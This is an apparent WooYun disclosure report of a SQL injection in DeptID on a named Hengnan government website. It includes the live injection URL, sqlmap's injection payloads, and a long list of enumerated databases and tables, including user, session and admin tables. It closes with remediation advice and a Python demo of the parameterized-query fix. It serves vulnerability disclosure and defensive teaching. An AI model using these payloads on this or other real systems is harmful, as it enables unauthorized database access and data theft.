
Vulnerability summary

Defect ID: wooyun-2014-050764

Title: SQL injection vulnerability in a Hengnan government website

Vendor: a Hengnan government website

Author: 路人甲

Submitted: 2014-02-12 18:54

Fixed: 2014-03-29 18:55

Disclosed: 2014-03-29 18:55

Type: SQL injection

Severity: Medium

Self-assessed Rank: 5

Status: Handed over to a third-party partner organisation (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure timeline:

2014-02-12: Details sent to the vendor, awaiting vendor handling
2014-02-17: Vendor confirmed; details disclosed to the vendor only
2014-02-27: Details disclosed to core white hats and relevant domain experts
2014-03-09: Details disclosed to regular white hats
2014-03-19: Details disclosed to intern white hats
2014-03-29: Details disclosed to the public

Summary:

SQL injection; databases and tables can be enumerated.

Details:


Injection point: http://www.hengnan.gov.cn/sssweb/DirectoryPublic/main.aspx?DeptID=DA0011
- Did not dump the database; made no deeper attempts.
-------------------------------------------------------------------
sqlmap identified the following injection points with a total of 38 HTTP(s) requests:
---
Place: GET
Parameter: DeptID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: DeptID=DA0011' AND 5904=5904 AND 'VsBm'='VsBm
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: DeptID=DA0011' AND 4497=CONVERT(INT,(SELECT CHAR(113)+CHAR(117)+CHAR(98)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (4497=4497) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(114)+CHAR(122)+CHAR(117)+CHAR(113))) AND 'vkzy'='vkzy
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: DeptID=DA0011'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: DeptID=DA0011' WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
available databases [10]:
[*] lumigent
[*] master
[*] model
[*] msdb
[*] Mud
[*] ReportServer
[*] ReportServerTempDB
[*] SAPP
[*] sappbak
[*] tempdb
Database: SAPP
[507 tables]
+-------------------------------------------------+
| SSSUSER.Bbs_online |
| SSSUSER.CommentStasticView |
| SSSUSER.D99_Tmp |
| SSSUSER.ENCR_OPDATA |
| SSSUSER.TAPP_20077119810 |
| SSSUSER.TAPP_20081111153537 |
| SSSUSER.TAPP_ADVICE_QUESTION |
| SSSUSER.TAPP_APPEAL |
| SSSUSER.TAPP_APPEAL_CONTENT |
| SSSUSER.TAPP_APPEAL_DETAIL |
| SSSUSER.TAPP_ASSESS_DEPT_CLASSIFY |
| SSSUSER.TAPP_ASSESS_DEPT_ITEMS |
| SSSUSER.TAPP_ASSESS_DEPT_MONTH |
| SSSUSER.TAPP_ASSESS_MANAGER_ITEM |
| SSSUSER.TAPP_ASSESS_USER_CLASSIFY |
| SSSUSER.TAPP_ASSESS_USER_ITEMS |
| SSSUSER.TAPP_ASSESS_USER_MONTH |
| SSSUSER.TAPP_Appraisals |
| SSSUSER.TAPP_Appraisals_Answer |
| SSSUSER.TAPP_Appraisals_Choices |
| SSSUSER.TAPP_Appraisals_Item |
| SSSUSER.TAPP_Appraisals_Question |
| SSSUSER.TAPP_CHECKITEM_LIST |
| SSSUSER.TAPP_CHECKITEM_LIST_REF |
| SSSUSER.TAPP_CHECKITEM_TABLE |
| SSSUSER.TAPP_CHECKITEM_TABLE_REF |
| SSSUSER.TAPP_COMMENT_LIST |
| SSSUSER.TAPP_COMMENT_LIST_REF |
| SSSUSER.TAPP_COMMUNION_INFO |
| SSSUSER.TAPP_COMMUNION_INFO_REF |
| SSSUSER.TAPP_DEPARTREF_LIST |
| SSSUSER.TAPP_DEPARTREF_LIST_REF |
| SSSUSER.TAPP_DICTIONARY |
| SSSUSER.TAPP_DUTY_LOG |
| SSSUSER.TAPP_DUTY_LOG_REF |
| SSSUSER.TAPP_DZJC |
| SSSUSER.TAPP_DZJC_REF |
| SSSUSER.TAPP_EFFICACY_MAIL |
| SSSUSER.TAPP_EFFICACY_MAIL_REF |
| SSSUSER.TAPP_FAQ_LIST |
| SSSUSER.TAPP_FAQ_LIST_REF |
| SSSUSER.TAPP_GUIDE |
| SSSUSER.TAPP_GUIDE_REF |
| SSSUSER.TAPP_HNXMH_INFO |
| SSSUSER.TAPP_HNXMH_INFO_REF |
| SSSUSER.TAPP_HNXMH_INFO_REF_bk200812151229_ywpx |
| SSSUSER.TAPP_HNXMH_INFO_REF_bk_ypx |
| SSSUSER.TAPP_Information_Public |
| SSSUSER.TAPP_MAINTENANCE_MATTER |
| SSSUSER.TAPP_MAINTENANCE_MATTER_REF |
| SSSUSER.TAPP_OPEN_INDEX |
| SSSUSER.TAPP_OPEN_INDEX_REF |
| SSSUSER.TAPP_OPEN_SENDER |
| SSSUSER.TAPP_PRINTER_FORM |
| SSSUSER.TAPP_PROVISIONS_LIST |
| SSSUSER.TAPP_PROVISIONS_LIST_REF |
| SSSUSER.TAPP_PUBLICSUGGESTION |
| SSSUSER.TAPP_PUBLICSUGGESTION_REF |
| SSSUSER.TAPP_Personalization_Tab |
| SSSUSER.TAPP_STATIC_DATA |
| SSSUSER.TAPP_SUBSCRIBE |
| SSSUSER.TAPP_SUBSCRIBE_COLUMN |
| SSSUSER.TAPP_SUGGESTION_ITEM |
| SSSUSER.TAPP_SUGGESTION_ITEM_REF |
| SSSUSER.TAPP_WORKGUIDE |
| SSSUSER.TAPP_WORKGUIDE_REF |
| SSSUSER.TJOL_DETAIL |
| SSSUSER.TJOL_DETAIL_REF |
| SSSUSER.TJOL_FIELD |
| SSSUSER.TJOL_FIELD_REF |
| SSSUSER.TJOL_GRADESTD |
| SSSUSER.TJOL_GRADESTD_REF |
| SSSUSER.TJOL_JOURNAL |
| SSSUSER.TJOL_JOURNAL_REF |
| SSSUSER.TJOL_JOURNAL_STUFF |
| SSSUSER.TJOL_JOURNAL_UNDERTAKER |
| SSSUSER.TJOL_ORGAN_SORT |
| SSSUSER.TJOL_ORGAN_SORT_TMP |
| SSSUSER.TJOL_STUFF |
| SSSUSER.TJOL_STUFF_GRADE |
| SSSUSER.TJOL_STUFF_GRADE_REF |
| SSSUSER.TJOL_STUFF_RECIPIENT |
| SSSUSER.TJOL_STUFF_REF |
| SSSUSER.TJOL_TEMPLATE |
| SSSUSER.TJOL_TYPE |
| SSSUSER.TJOL_TYPE_REF |
| SSSUSER.TOPR_MODULE |
| SSSUSER.TOPR_MODULE_OBJECT |
| SSSUSER.TOPR_MODULE_OBJECT_OPERATE |
| SSSUSER.TOPR_OBJECT |
| SSSUSER.TOPR_OPERATE |
| SSSUSER.TOPR_OPERATE_LOG |
| SSSUSER.TVPP_ADVICE_COUNT |
| SSSUSER.Tapp_Advice_Question_REF |
| SSSUSER.VAPP_ASSESS_MANAGER_ITEM |
| SSSUSER.VAPP_Appraisals |
| SSSUSER.VAPP_GETGRANTEDFOLDERBYROLE |
| SSSUSER.VAPP_Information_Public |
| SSSUSER.VIEW_STATIC_BMDT_DETAIL |
| SSSUSER.VIEW_STATIC_BMDT_LIST |
| SSSUSER.VIEW_STATIC_MTZH_DETAIL |
| SSSUSER.VIEW_STATIC_MTZH_LIST |
| SSSUSER.VIEW_STATIC_WJGG_DETAIL |
| SSSUSER.VIEW_STATIC_WJGG_LIST |
| SSSUSER.VIEW_STATIC_ZFWJ_DETAIL |
| SSSUSER.VIEW_STATIC_ZFWJ_LIST |
| SSSUSER.VIEW_STATIC_ZWDT_DETAIL |
| SSSUSER.VIEW_STATIC_ZWDT_LIST |
| SSSUSER.VIEW_STATIC_ZXWJ_DETAIL |
| SSSUSER.VIEW_STATIC_ZXWJ_LIST |
| SSSUSER.VJOL_DETAIL |
| SSSUSER.VJOL_FIELD |
| SSSUSER.VJOL_GRADESTD |
| SSSUSER.VJOL_JOURNAL |
| SSSUSER.VJOL_JOURNAL_STUFF |
| SSSUSER.VJOL_STUFF |
| SSSUSER.VJOL_STUFF_DETAIL |
| SSSUSER.VJOL_STUFF_STD_REPORT |
| SSSUSER.VJOL_TEMPLATE |
| SSSUSER.VJOL_TYPE |
| SSSUSER.VOPR_MODULE_OBJECT_OPERATE |
| SSSUSER.Vapp_CheckItem |
| SSSUSER.companyInfo |
| SSSUSER.countAllPage |
| SSSUSER.countDay |
| SSSUSER.countDayList |
| SSSUSER.member |
| SSSUSER.memberInfo |
| SSSUSER.tapp_Image_News |
| SSSUSER.tapp_Role_Dept |
| SSSUSER.tapp_SuggestionManagement_Suggestion |
| SSSUSER.tapp_category_template |
| SSSUSER.tapp_column |
| SSSUSER.tapp_column_template |
| SSSUSER.tapp_comment |
| SSSUSER.tapp_info_exchange |
| SSSUSER.tapp_personal_group |
| SSSUSER.tapp_personal_module |
| SSSUSER.tapp_personal_user_module |
| SSSUSER.tapp_publish_history |
| SSSUSER.tapp_publish_items |
| SSSUSER.tapp_publish_setting |
| SSSUSER.tapp_reference_article |
| SSSUSER.tapp_relactive_article |
| SSSUSER.tapp_resource |
| SSSUSER.tapp_schema |
| SSSUSER.tapp_schema_button |
| SSSUSER.tapp_website |
| SSSUSER.tblTestNull |
| SSSUSER.tbl_foldermanager |
| SSSUSER.vapp_advice_question |
| SSSUSER.vapp_category_template |
| SSSUSER.vapp_column |
| SSSUSER.vapp_column_template |
| SSSUSER.vapp_open |
| SSSUSER.vapp_schema |
| SSSUSER.vapp_suggest_check_list |
| SSSUSER.vapp_suggestion_history |
| SSSUSER.vapp_suggestion_newlist |
| SSSUSER.vjjsp_flow_message |
| AIP_DOC |
| AIP_LOGIN_SESSION |
| AIP_SEAL |
| AIP_SEALLOCATE |
| AIP_SESSION |
| AIP_USER |
| AIP_USER_CERT |
| AIP_USER_SEAL |
| Bbs_admingroups |
| Bbs_adminvisitlog |
| Bbs_advertisements |
| Bbs_announcements |
| Bbs_attachments |
| Bbs_attachtypes |
| Bbs_bbcodes |
| Bbs_creditslog |
| Bbs_failedlogins |
| Bbs_favorites |
| Bbs_forumfields |
| Bbs_forumlinks |
| Bbs_forums |
| Bbs_medals |
| Bbs_medalslog |
| Bbs_moderatormanagelog |
| Bbs_moderators |
| Bbs_onlinelist |
| Bbs_paymentlog |
| Bbs_pms |
| Bbs_polls |
| Bbs_postid |
| Bbs_posts1 |
| Bbs_ratelog |
| Bbs_searchcaches |
| Bbs_smilies |
| Bbs_statistics |
| Bbs_tablelist |
| Bbs_templates |
| Bbs_topics |
| Bbs_userfields |
| Bbs_usergroups |
| Bbs_users |
| Bbs_words |
| ColumnMap |
| TAIPUSER |
| TAPP_ACCOUNT |
| TAPP_BUSINESS_NOTICE |
| TAPP_CALENDAR |
| TAPP_CATEGORY |
| TAPP_CATEGORY_ITEM |
| TAPP_CATEGORY_PROTOCOL |
| TAPP_CATEGORY_RELATION |
| TAPP_CODER |
| TAPP_CODER_GROUP |
| TAPP_CODER_NODE |
| TAPP_CODER_NODE_SEQUENCE_NO |
| TAPP_CONDITION_ITEM |
| TAPP_COND_OBJ |
| TAPP_DATA_DICT |
| TAPP_DATA_DICT_ITEM |
| TAPP_DAY |
| TAPP_DEPT |
| TAPP_DEPT_ROLE |
| TAPP_DEPT_USER |
| TAPP_DISPATCH_RULE |
| TAPP_DISPLAY_FORMAT |
| TAPP_DOCUMENT |
| TAPP_DOCUMENT_EXCHANGE |
| TAPP_DOCUMENT_MESSAGE |
| TAPP_EXCH_REQUEST |
| TAPP_EXCH_REQUEST_FEEDBACK |
| TAPP_EXCH_REQUEST_MSG |
| TAPP_EXCH_RESPONSE |
| TAPP_EXCH_RESPONSE_MSG |
| TAPP_EXCH_TRIGGER |
| TAPP_FIELD |
| TAPP_FIELD_DEFAULT |
| TAPP_FILE |
| TAPP_FILE_CONTENT |
| TAPP_FILE_REFERENCE |
| TAPP_FK |
| TAPP_FK_FIELD |
| TAPP_FOLDER |
| TAPP_FOLDER_BUTTON |
| TAPP_FOLDER_GRID |
| TAPP_FOLDER_MANAGER |
| TAPP_FOLDER_URL |
| TAPP_FORM |
| TAPP_ID_MAKER |
| TAPP_INFO_FILE |
| TAPP_LEADER_ASSIGN |
| TAPP_LEADER_ASSIGN_REF |
| TAPP_LINKMAN |
| TAPP_LINKMANGROUP |
| TAPP_MAIL |
| TAPP_MAIL_AGENT |
| TAPP_MAIL_CONTACT |
| TAPP_MAIL_MESSAGE |
| TAPP_MAIL_RECIPIENT |
| TAPP_MEET |
| TAPP_MEET_REF |
| TAPP_MEET_SUBJECT |
| TAPP_MEET_SUBJECT_REF |
| TAPP_NODE_TYPE |
| TAPP_OBJ_OPERATION |
| TAPP_OBJ_TYPE |
| TAPP_ORGAN |
| TAPP_ORGAN_GROUP |
| TAPP_ORGAN_GROUP_MEMBER |
| TAPP_ORGAN_REF |
| TAPP_QUERY |
| TAPP_QUERY_FIELD |
| TAPP_QUERY_RELATION |
| TAPP_QUERY_RELATION_1 |
| TAPP_QUERY_RELATION_FIELD |
| TAPP_QUERY_RELATION_FIELD_1 |
| TAPP_QUESTIONDEAL |
| TAPP_QUESTION_DEAL |
| TAPP_QUESTION_DEAL_REF |
| TAPP_RESOLUTION |
| TAPP_ROLE |
| TAPP_ROLE_ALL_USER |
| TAPP_ROLE_GROUP |
| TAPP_ROLE_OBJ_PRIV |
| TAPP_SEAL |
| TAPP_SEQUENCE_NO |
| TAPP_SESSION |
| TAPP_SYS_PARAM |
| TAPP_TABLE |
| TAPP_TMP_DEPT |
| TAPP_USER |
| TAPP_USER_CERT |
| TAPP_USER_OBJ_PRIV |
| TAPP_USER_ROLE |
| TAPP_WEEK_DAY |
| TCSC_ACCOUNT |
| TCSC_ADMIN_USER |
| TCSC_DEPT |
| TCSC_DEPT_USER |
| TCSC_ID_MAKER |
| TCSC_MODULE |
| TCSC_ORGAN |
| TCSC_ORGAN_USER |
| TCSC_PROTOCOL |
| TCSC_PUBLISH |
| TCSC_PUBLISH_CONTENT |
| TCSC_PUBLISH_MESSAGE |
| TCSC_PUBLISH_MODULE |
| TCSC_SERVER |
| TCSC_SERVER_LINK |
| TCSC_SERVER_ORGAN |
| TCSC_SESSION |
| TCSC_SUBSCRIBE |
| TCSC_SUBSCRIBE_MESSAGE |
| TCSC_SUBSCRIBE_MODULE |
| TCSC_USER |
| THYSP_BJDJB |
| THYSP_BJDJB_REF |
| TICP_ADAPTER |
| TICP_ADAPTER_METHOD |
| TICP_ADAPTER_PROTOCOL |
| TICP_ADAPTER_WEBSERVICE |
| TICP_ADMIN_USER |
| TICP_ATTACHMENT |
| TICP_ATTACH_CONTENT |
| TICP_EVENT_DICT |
| TICP_EVENT_LOG |
| TICP_ID_MAKER |
| TICP_MESSAGE |
| TICP_MESSAGE_EVENT |
| TICP_MESSAGE_EXCHANGE |
| TICP_RECV_EXCHANGE |
| TICP_RECV_FEEDBACK |
| TICP_RECV_QUEUE |
| TICP_SEND_EXCHANGE |
| TICP_SEND_FEEDBACK |
| TICP_SEND_QUEUE |
| TICP_SYS_PARAMETER |
| TICP_TRANSFER_EXCHANGE |
| TICP_TRANSFER_FEEDBACK |
| TICP_TRANSFER_QUEUE |
| TICP_WEBSERVICE |
| TICP_WEBSERVICE_ORGAN |
| TICP_XML_FILE |
| TJJSP_BBJL |
| TJJSP_BJTJ |
| TJJSP_ZXSPBD |
| TJJSP_ZXSPBD_REF |
| TWKF_AGENT |
| TWKF_FIELD_MAPPING |
| TWKF_FLOW_ACTOR |
| TWKF_FLOW_ALERT |
| TWKF_FLOW_INSTANCE |
| TWKF_FLOW_MODEL |
| TWKF_FLOW_MODEL_ORDER |
| TWKF_FLOW_NOTICE |
| TWKF_FLOW_PAUSE_TIME |
| TWKF_FORM_DATA |
| TWKF_LINK_EXP |
| TWKF_MESSAGE |
| TWKF_MESSAGE_ACTION |
| TWKF_MESSAGE_LINK |
| TWKF_MESSAGE_RECIPIENTS |
| TWKF_MESSAGE_SIGN |
| TWKF_MODEL_ACTION_GROUP |
| TWKF_MODEL_FILE_SETTING |
| TWKF_MODEL_LINK |
| TWKF_MODEL_NODE |
| TWKF_MODEL_NODE_ACTION |
| TWKF_MODEL_NODE_FIELD |
| TWKF_NODE_FILE_SETTING |
| TWKF_OPINION |
| TWKF_RELATIVE_INSTANCE |
| TWKF_SEND_FILL_FIELD |
| TWKF_SHOW_FORM_SETTING |
| TWKF_SUBFLOW_SETTING |
| VAPP_BUSINESS_NOTICE |
| VAPP_CATEGORY_PROTOCOL |
| VAPP_CONDITION_ITEM |
| VAPP_DAY |
| VAPP_DEPT_USER |
| VAPP_DEPT_USERNAME |
| VAPP_DICT |
| VAPP_DICT_ITEM |
| VAPP_DISPLAY_FORMAT |
| VAPP_DOCUMENT |
| VAPP_DOCUMENT_EXCHANGE |
| VAPP_DOCUMENT_EXCHANGED |
| VAPP_DOCUMENT_EXCHANGE_DETAIL |
| VAPP_DOCUMENT_EXCHANGE_DETAIL1 |
| VAPP_DOCUMENT_EXCHANGE_OLD |
| VAPP_DOCUMENT_LIST |
| VAPP_DOCUMENT_OLD |
| VAPP_DOC_MSG_STATISTIC |
| VAPP_FILE |
| VAPP_FILE_REFERENCE |
| VAPP_FOLDER |
| VAPP_FORM |
| VAPP_GETALLPRIVBYROLE |
| VAPP_GETALLPRIVBYUSER |
| VAPP_GETCODENODEBYSEQUENCEID |
| VAPP_GETDEPTBYROLEID |
| VAPP_GETDEPTBYUSERID |
| VAPP_GETFIELDS_BYTABLENAME |
| VAPP_GETFIELD_DATATYPE |
| VAPP_GETFOLDERBYROLE |
| VAPP_GETFOLDERBYUSER |
| VAPP_GETQUERYS_BYCATEGORYID |
| VAPP_GETROLEBYDEPTID |
| VAPP_GETROLEBYPRIVOBJ |
| VAPP_GETROLEBYUSERID |
| VAPP_GETROLEOBJPRIVBYUSERID |
| VAPP_GETSEQUENCENOBYCODENODE |
| VAPP_GETTABLES_BYCATEGORYID |
| VAPP_GETUSERBYDEPTID |
| VAPP_GETUSERBYPRIVOBJ |
| VAPP_GETUSERBYROLE |
| VAPP_GETUSERBYROLEID |
| VAPP_GETUSERFOLDERBYROLE |
| VAPP_GETUSERFOLDERBYUSER |
| VAPP_INFO_FILE |
| VAPP_MAIL |
| VAPP_MEET_SUBJECT |
| VAPP_METADATA_OBJECT |
| VAPP_METADATA_OBJECT_FIELD |
| VAPP_ORGAN_GROUP |
| VAPP_ORGAN_USER |
| VAPP_SESSION |
| VAPP_USER |
| VAPP_USER_LIST |
| VAPP_USER_MAIN_DEPT |
| VAPP_WEEKDAY |
| VCSC_GETDEPTBYUSERID |
| VCSC_GETUSERBYDEPTID |
| VCSC_PUBLISH_MODULE |
| VCSC_SUBSCRIBE_MODULE |
| VCSC_USER |
| VJJSP_ECSJ |
| VJJSP_LCSL |
| VJJSP_LCSL_SEGMENT_OVERTIME |
| VJJSP_LCSL_TOTAL_OVERTIME |
| VWKF_AGENT |
| VWKF_FIELDMAPPING |
| VWKF_FIELDPRIVILEGE |
| VWKF_FLOW_INSTANCE |
| VWKF_FLOW_MODEL |
| VWKF_FLOW_NOTICE |
| VWKF_GETFLOWMDLS_BYSTARTACTOR |
| VWKF_INSTANCE_ALERT |
| VWKF_INST_FORM_DATA |
| VWKF_INST_NEXT_MESSAGE |
| VWKF_INST_PREVIOUS_MESSAGE |
| VWKF_MESSAGE |
| VWKF_MESSAGE_ALERT |
| VWKF_MESSAGE_LEAVE_ACTION |
| VWKF_MESSAGE_LIST |
| VWKF_MESSAGE_NEW |
| VWKF_MESSAGE_OLD |
| VWKF_MODEL_NEXT_NODE |
| VWKF_MODEL_PREVIOUS_NODE |
| VWKF_MSG_FORM_DATA |
| VWKF_RELATIVE_INSTANCE |
| VWKF_SENDFILLFIELD |
| VWKF_WAITING_MSG_FORM_DATA |
| dtproperties |
| sysdiagrams |
| tapp_Log |
| thy_vote |
| thy_vote_ballot |
| thy_vote_option |
| thy_vote_option_append |
| thy_vote_question |
| thy_vote_questionnaire |
| vicp_adapter |
| vicp_adapter_method |
| vicp_adapter_methodx |
| vicp_adapter_protocol |
| vicp_adapter_webservice |
| vicp_adapter_webservice_organ |
| vicp_admin_user |
| vicp_attach_content |
| vicp_attachment |
| vicp_console_log |
| vicp_console_message |
| vicp_console_receive |
| vicp_console_send |
| vicp_console_trans |
| vicp_event_log |
| vicp_message |
| vicp_message_exchange |
| vicp_queue_feedback |
| vicp_recv_exchange |
| vicp_recv_feedback |
| vicp_recv_feedback_webservice |
| vicp_recv_queue |
| vicp_recv_queue_webservice |
| vicp_recv_queuex |
| vicp_send_exchange |
| vicp_send_feedback |
| vicp_send_queue |
| vicp_send_queuex |
| vicp_sys_parameter |
| vicp_transfer_exchange |
| vicp_transfer_feedback |
| vicp_transfer_queue |
| vicp_transfer_queuex |
| vicp_xml_file |
| vjjsp_all_bj |
+-------------------------------------------------+

Proof of vulnerability:


Remediation:

Strict filtering of input characters. Character filtering on its own is fragile; the durable fix for this ASP.NET/SQL Server code path is to pass DeptID as a bound parameter (SqlCommand with SqlParameter) instead of concatenating it into the query text. The sqlmap output also shows the application's database login can list every database on the instance (master, msdb, ReportServer, ...), so that login should be restricted to the SAPP objects the site actually needs.
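The following is an added example, not code from the original report or from the affected site. It models the DeptID concatenation bug in Python against an in-memory SQLite table that stands in for the SQL Server 2005 backend (the `dept` table, its rows, and the flipped "false" payload are constructed assumptions). It replays the boolean-based payload from the sqlmap output above to show the true/false oracle sqlmap detected, evaluates the error-based payload's CHAR() markers to show what the conversion error would leak, and puts the parameterized query beside the vulnerable one. The SQL Server-only pieces (WAITFOR DELAY, CONVERT(INT, ...)) are not executed here.

```python
"""
Added example (not part of the WooYun report): why the DeptID parameter is a
boolean oracle, what the error-based marker leaks, and the parameterized fix.
SQLite stands in for SQL Server 2005; table and rows are constructed.
"""
import re
import sqlite3

# Constructed stand-in for the department lookup behind main.aspx.
_CONN = sqlite3.connect(":memory:")
_CONN.execute("CREATE TABLE dept (DeptID TEXT PRIMARY KEY, DeptName TEXT)")
_CONN.executemany(
    "INSERT INTO dept VALUES (?, ?)",
    [("DA0011", "Dept A"), ("DA0012", "Dept B")],
)

# Payloads copied verbatim from the sqlmap output above ...
TRUE_PAYLOAD = "DA0011' AND 5904=5904 AND 'VsBm'='VsBm"
ERROR_PAYLOAD = (
    "DA0011' AND 4497=CONVERT(INT,(SELECT CHAR(113)+CHAR(117)+CHAR(98)+CHAR(106)"
    "+CHAR(113)+(SELECT (CASE WHEN (4497=4497) THEN CHAR(49) ELSE CHAR(48) END))"
    "+CHAR(113)+CHAR(114)+CHAR(122)+CHAR(117)+CHAR(113))) AND 'vkzy'='vkzy"
)
# ... and a constructed counterpart with the comparison made false.
FALSE_PAYLOAD = "DA0011' AND 5904=5905 AND 'VsBm'='VsBm"


def vulnerable_lookup(dept_id: str) -> list:
    """The bug as the page shows it: DeptID is spliced into the SQL text, so a
    quote in the value closes the literal and the rest runs as SQL."""
    sql = "SELECT DeptName FROM dept WHERE DeptID='" + dept_id + "'"
    return [row[0] for row in _CONN.execute(sql)]


def safe_lookup(dept_id: str) -> list:
    """The fix: a bound parameter. The entire string is compared as data, so a
    payload matches no row instead of changing the query."""
    sql = "SELECT DeptName FROM dept WHERE DeptID=?"
    return [row[0] for row in _CONN.execute(sql, (dept_id,))]


def boolean_blind_detectable(lookup) -> bool:
    """sqlmap's boolean-based test in miniature: the parameter is injectable
    when a true and a false condition yield different responses."""
    return lookup(TRUE_PAYLOAD) != lookup(FALSE_PAYLOAD)


_CASE_RE = re.compile(
    r"CASE WHEN \((\d+)=(\d+)\) THEN CHAR\((\d+)\) ELSE CHAR\((\d+)\) END"
)


def simulate_error_marker(payload: str) -> str:
    """Model the string the error-based payload makes SQL Server echo back.
    The CASE yields '1' or '0'; sqlmap wraps it in random CHAR() markers so it
    can pick the bit out of the 'Conversion failed when converting the varchar
    value ... to data type int' error text."""
    m = _CASE_RE.search(payload)
    if not m:
        raise ValueError("no sqlmap CASE marker found in payload")
    lhs, rhs, then_c, else_c = (int(g) for g in m.groups())
    head, tail = payload[: m.start()], payload[m.end():]
    prefix = "".join(chr(int(n)) for n in re.findall(r"CHAR\((\d+)\)", head))
    suffix = "".join(chr(int(n)) for n in re.findall(r"CHAR\((\d+)\)", tail))
    bit = chr(then_c if lhs == rhs else else_c)
    return prefix + bit + suffix


if __name__ == "__main__":
    print("vulnerable, true cond :", vulnerable_lookup(TRUE_PAYLOAD))
    print("vulnerable, false cond:", vulnerable_lookup(FALSE_PAYLOAD))
    print("injectable (vulnerable):", boolean_blind_detectable(vulnerable_lookup))
    print("injectable (safe)      :", boolean_blind_detectable(safe_lookup))
    print("error-based marker     :", simulate_error_marker(ERROR_PAYLOAD))
```

The oracle is the whole attack: once a true condition returns the normal page and a false one returns an empty or different page, any query can be asked one bit at a time, which is how sqlmap produced the database and table lists above without ever seeing query output directly. With the bound parameter, both payloads return the same (empty) result and the oracle disappears.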

Copyright notice: when reposting, please credit the source: 路人甲@乌云


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2014-02-17 09:14

Vendor reply:

Latest status:

None yet